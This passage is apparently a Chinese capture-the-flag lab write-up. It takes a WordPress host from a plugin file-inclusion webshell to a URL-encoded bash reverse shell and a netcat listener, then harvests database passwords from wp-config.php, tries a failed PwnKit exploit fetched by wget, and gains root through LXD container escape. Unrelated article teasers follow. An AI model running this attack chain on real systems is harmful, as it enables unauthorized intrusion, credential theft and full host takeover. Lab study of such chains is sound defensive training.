└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

4.2.3、蚁剑连接失败

不知道为啥蚁剑经常连接失败。。。可能是我用的不对吧

5、反弹连接

  • 反弹连接命令采用URL编码
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# echo $(python3 -c "import urllib.parse; print(urllib.parse.quote('''bash -c 'bash -i >& /dev/tcp/192.168.110.139/10086 0>&1''', safe=''))")
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%26
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.110.139%2F10086%200%3E%261"
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# nc -lvnp 10086                                                                                    
listening on [any] 10086 ...
connect to [192.168.110.139] from (UNKNOWN) [192.168.110.138] 43884
bash: cannot set terminal process group (1207): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$ cd ~
www-data@hackerctflab:/var/www$

6、www-data 用户 信息收集

  • 获取信息:
    • 数据库用户密码:root : root
    • 这里尝试S权限:polkit-agent-helper-1 (CVE-2021-4034)提权
    • 没有找到什么过多有用的信息,还是返回「3.2.3」进行操作,才能提权
www-data@hackerctflab:/var/www$ grep -ri -E 'DB_PASSWORD' *
grep -ri -E 'DB_PASSWORD' *
html/wp/wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
html/wp/wp-admin/setup-config.php:                              case 'DB_PASSWORD':
html/wp/wp-config.php:define( 'DB_PASSWORD', 'root' );
html/wp/wp-config-sample.php:define( 'DB_PASSWORD', 'password_here' );
html/wp/wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
www-data@hackerctflab:/var/www$ cat html/wp/wp-config.php
cat html/wp/wp-config.php
<?php
......
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'root' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
......
www-data@hackerctflab:/var/www$ find / -perm -u=s -type f 2>/dev/null | grep -v "/snap/"
find / -perm -u=s -type f 2>/dev/null
/usr/libexec/polkit-agent-helper-1
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/chsh
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

6.1、尝试 CVE-2021-4034 提权(失败)

  • 靶机 gcc 版本确定
www-data@hackerctflab:/tmp$ ldd --version
ldd --version
ldd (Ubuntu GLIBC 2.33-0ubuntu5) 2.33
Copyright (C) 2021 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
  • kali 编译
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# gcc cve-2021-4034.c -o exp -Ldir /usr/local/soft/hack/libc/lib/x86_64-linux-gnu/libc.so.6
                                                                                                       
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  exp  LICENSE  Makefile  pwnkit.c  README.md

(base) ┌──(root㉿kali)-[/usr/local/soft/hack/CVE-2021-4034]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.110.138 - - [04/Dec/2023 23:08:18] "GET /exp HTTP/1.1" 200 -
  • 靶机执行
www-data@hackerctflab:/tmp$ wget "http://192.168.110.139/exp"
wget "http://192.168.110.139/exp"
--2023-12-04 15:08:20--  http://192.168.110.139/exp
Connecting to 192.168.110.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15960 (16K) [application/octet-stream]
Saving to: 'exp'

     0K .......... .....                                      100%  129M=0s

2023-12-04 15:08:20 (129 MB/s) - 'exp' saved [15960/15960]

www-data@hackerctflab:/tmp$ chmod +x exp
chmod +x exp
www-data@hackerctflab:/tmp$ ./exp
./exp
GLib: Cannot convert message: Could not open converter from “UTF-8” to “PWNKIT”
Cannot run program pwnkit.so:.: No such file or directory

7、jarves 用户 信息收集

  • id 具有权限:116(lxd)
jarves@hackerctflab:~$ history
    1  sudo su -
    2  ifconfig
    3  ls
    4  cd upload/
    5  ls
    6  ls -l
    7  cd ..
    8  ls -l
    9  chmod 755 jarves/
   10  history
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves@hackerctflab:~$ sudo -l
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
Sorry, try again.
[sudo] password for jarves: 
sudo: 3 incorrect password attempts
jarves@hackerctflab:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
jarves@hackerctflab:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
jarves@hackerctflab:~$ echo $BASH_VERSION
5.1.4(1)-release

8、LXD 提权

  • SMB 上传文件
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# git clone https://github.com/saghul/lxd-alpine-builder

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd lxd-alpine-builder

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put alpine-v3.13-x86_64-20210218_0139.tar.gz 
putting file alpine-v3.13-x86_64-20210218_0139.tar.gz as \alpine-v3.13-x86_64-20210218_0139.tar.gz (25670.9 kb/s) (average 25670.9 kb/s)
smb: \> exit
  • 后续可以上传「.ssh」实现免密登录
jarves@hackerctflab:~$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz  secrets  something  upload
jarves@hackerctflab:~$ lxc image import ./alpine*.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
jarves@hackerctflab:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

jarves@hackerctflab:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
jarves@hackerctflab:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
jarves@hackerctflab:~$ lxc start mycontainer
jarves@hackerctflab:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/219909.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

算法竞赛备赛进阶之区间DP训练

区间动态规划&#xff08;Interval Dynamic Programming&#xff0c;简称 IDP&#xff09;是一种动态规划算法&#xff0c;用于解决包含区间状态的优化问题。在区间动态规划中&#xff0c;问题可以划分为多个不重叠的区间&#xff0c;每个区间可以独立求解&#xff0c;并且状态…

分享126个图片JS特效,总有一款适合您

分享126个图片JS特效&#xff0c;总有一款适合您 126个图片JS特效下载链接&#xff1a;https://pan.baidu.com/s/1sOKHo4RciQXwQX9vhLIm3g?pwd6666 提取码&#xff1a;6666 Python采集代码下载链接&#xff1a;采集代码.zip - 蓝奏云 学习知识费力气&#xff0c;收集整…

​CAN FD一致性测试:便捷、高效的自动化测试系统

后起之秀——CAN FD&#xff1a;随着各个行业的快速发展&#xff0c;消费者对汽车电子智能化的诉求越来越强烈&#xff0c;这使得整车厂将越来越多的电子控制系统加入到了汽车控制中&#xff0c;且在传统汽车、新能源汽车、ADAS和自动驾驶等汽车领域中也无不催生着更高的需求&a…

机器学习---朴素贝叶斯分类器的实现(对文本进行侮辱性言论和非侮辱性言论的分类)

1. loadDataSet函数 import numpy as np# 构造loadDataSet函数用于生成实验样本 def loadDataSet(): postingList[[my, dog, has, flea, problems, help, please],[maybe, not, take, him, to, dog, park, stupid],[my, dalmation, is, so, cute, I, love, him],[stop, postin…

JDK8升级11常见问题

JDK8升级11常见问题 1. 使用rt.jar/jce.jar情况 原代码&#xff1a; <plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-compiler-plugin</artifactId><configuration><source>1.8</source><targe…

计算机网络入侵检测技术研究

摘 要 随着网络技术的发展&#xff0c;全球信息化的步伐越来越快&#xff0c;网络信息系统己成为一个单位、一个部门、一个行业&#xff0c;甚至成为一个关乎国家国计民生的基础设施&#xff0c;团此&#xff0c;网络安全就成为国防安全的重要组成部分&#xff0c;入侵检测技术…

CUDA简介——For循环并行化

1. 引言 前序博客&#xff1a; CUDA简介——基本概念CUDA简介——编程模式 kernel相关语法定义为&#xff1a; kernel函数定义&#xff0c;与常规C函数定义类似。不同之处在于&#xff0c;有__global__关键字。 为说明符&#xff0c;告诉编译器该函数应编译运行在device上&a…

Understanding Computer Hardware

文章目录 I. Input Devices1. Keyboard&#xff08;1&#xff09;Layout&#xff08;2&#xff09;Key Types&#xff08;3&#xff09;Functionality&#xff08;4&#xff09;Connectivity&#xff08;5&#xff09;Ergonomics&#xff08;6&#xff09;Multimedia Keys&…

伯俊软件CTO陈雨陆:R3全渠道业务中台的OceanBase落地实践

11 月 16 日&#xff0c;OceanBase 在京顺利举办 2023 年度发布会&#xff0c;正式宣布&#xff1a;将持续践行“一体化”产品战略&#xff0c;为关键业务负载打造一体化数据库。其中&#xff0c;“数字化转型升级实践专场”我们有幸邀请到伯俊软件 CTO 陈雨陆进行《OceanBase …

java easyPOI导出一对多数据,设置边框,字体,字体大小

java easyPOI导出一对多数据&#xff0c;设置边框&#xff0c;字体&#xff0c;字体大小 需求总是千奇百怪&#xff0c;解决的方式也可以是多种多样。 今天碰到导出excel是一对多结构的&#xff0c;以往导出的数据都是一条一条的&#xff0c;所以采用的是比较方便简单的方法eas…

全网最新最全面的Appium自动化:Appium常用操作之设备操作

设备基本操作 前置条件&#xff1a; 示例代码&#xff1a; from appium import webdriver # 导入appium 驱动包 # 1、定义一个DesiredCapabilities配置的字典 des {automationName:appium,platformName:Android, # 平台的名称&#xff0c;iOS,Android,FirefoxOSplatformV…

打开游戏提示缺少(或找不到)XINPUT1_3.DLL怎么解决

在电脑使用过程中&#xff0c;我们可能会遇到一些错误提示&#xff0c;其中之一就是xinput1_3.dll丢失。那么&#xff0c;xinput1_3.dll是什么文件&#xff1f;它对电脑有什么影响&#xff1f;本文将详细介绍xinput1_3.dll丢失的原因以及五个详细的解决方法&#xff0c;帮助大家…

初识Protobuf与Protobuf的安装

目录 一、Protobuf 1.回顾序列化 2.Protobuf的特性 3.Protobuf的下载 ①ProtoBuf 在 window 下的安装 ②ProtoBuf 在 Linux 下的安装 一、Protobuf 1.回顾序列化 我们在先前的学习中也遇到过序列化。所谓序列化我的理解是&#xff0c;将复杂的对象以特定的方式转换以便于…

vue3-vite-ts:编写Rollup插件并使用 / 优化构建过程

一、vue3-vite-ts项目&#xff0c;编写Rollup插件并使用的意义 在使用Vue3 Vite TypeScript这种技术栈时&#xff0c;可以使用Rollup插件来优化构建过程&#xff0c;例如使用rollup-plugin-typescript2插件来编译TypeScript代码&#xff0c;使用rollup-plugin-vue插件来处理…

go-fastfds部署心得

我是windows系统安装 Docker Desktop部署 docker run --name go-fastdfs&#xff08;任意的一个名称&#xff09; --privilegedtrue -t -p 3666:8080 -v /data/fasttdfs_data:/data -e GO_FASTDFS_DIR/data sjqzhang/go-fastdfs:lastest docker run&#xff1a;该命令用于运…

基于深度学习YoloV8的火焰烟雾检测系统

欢迎大家点赞、收藏、关注、评论啦 &#xff0c;由于篇幅有限&#xff0c;只展示了部分核心代码。 文章目录 一项目简介简介YoloV8模型火焰烟雾检测系统模型训练实时检测 应用领域 二、功能三、系统四. 总结 一项目简介 # 基于深度学习YoloV8的火焰烟雾检测系统介绍 简介 深…

【Unity3D】Android打包报错AAPT2:xxx Linkxxx

Gradle Plugin 与Gradle版本不匹配问题 或 相关依赖库下载不完全问题&#xff1b; 使用镜像即可解决 也可以离线&#xff08;离线过于复杂 你能找到方法那最好是离线Maven) 仓库服务 找最新可用的镜像url&#xff0c;替换google()和jcenter()&#xff0c; 可以直接使用publ…

StoneDB-8.0-V2.2.0 企业版正式发布!性能优化,稳定性提升,持续公测中!

​ 11月&#xff0c;StoneDB 新版本如期而至&#xff0c;这一个月来我们的研发同学加班加点&#xff0c;持续迭代&#xff1a;在 2.2.0 版本中&#xff0c;我们针对用户提出的需求和做出了重量级更新&#xff0c;修复了一些已知和用户反馈的 Bug&#xff0c;同时对部分代码进行…

如何计算光伏电站的发电量?

光伏电站的发电量是衡量其性能和经济效益的关键指标。准确地预测和计算光伏电站的发电量对于投资决策、系统设计和优化至关重要。以下是一些计算光伏电站发电量的主要步骤和方法&#xff1a; 1、确定光伏电站的规模和配置 了解光伏电站的组件数量、类型、功率等级以及安装位置…

Win10点关机后马上又进入桌面解决方法

Win10点了关机&#xff0c;马上闪一下就又重新进入了桌面&#xff0c;关不了机怎么办&#xff1f;强制关机虽然是可行&#xff0c;但不能每一次都强制关机。下面给大家带来的win10不能关机的解决方法&#xff0c;希望能帮助到大家。 速印机&#xff08;理想、荣大等&#xff09…